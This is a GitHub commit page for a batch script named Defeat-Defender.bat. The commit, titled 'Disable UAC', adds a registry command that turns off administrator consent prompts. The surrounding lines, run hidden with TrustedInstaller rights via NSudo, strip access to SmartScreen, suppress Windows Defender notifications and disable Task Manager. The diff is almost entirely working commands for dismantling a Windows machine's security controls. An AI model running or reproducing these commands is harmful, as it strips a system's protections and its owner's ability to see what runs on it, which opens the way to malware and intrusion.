Skip to content

Commit

Permalink
Disable UAC
Browse files Browse the repository at this point in the history
  • Loading branch information
AliMilani committed Dec 31, 2021
1 parent e01ef82 commit 78d8592
Showing 1 changed file with 2 additions and 0 deletions.
2 changes: 2 additions & 0 deletions Defeat-Defender.bat
Original file line number Diff line number Diff line change
Expand Up @@ -38,6 +38,8 @@ set pop=%systemroot%

NSudo -U:T -ShowWindowMode:Hide icacls "%pop%\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18

NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f

NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f

NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
Expand Down

0 comments on commit 78d8592

Please sign in to comment.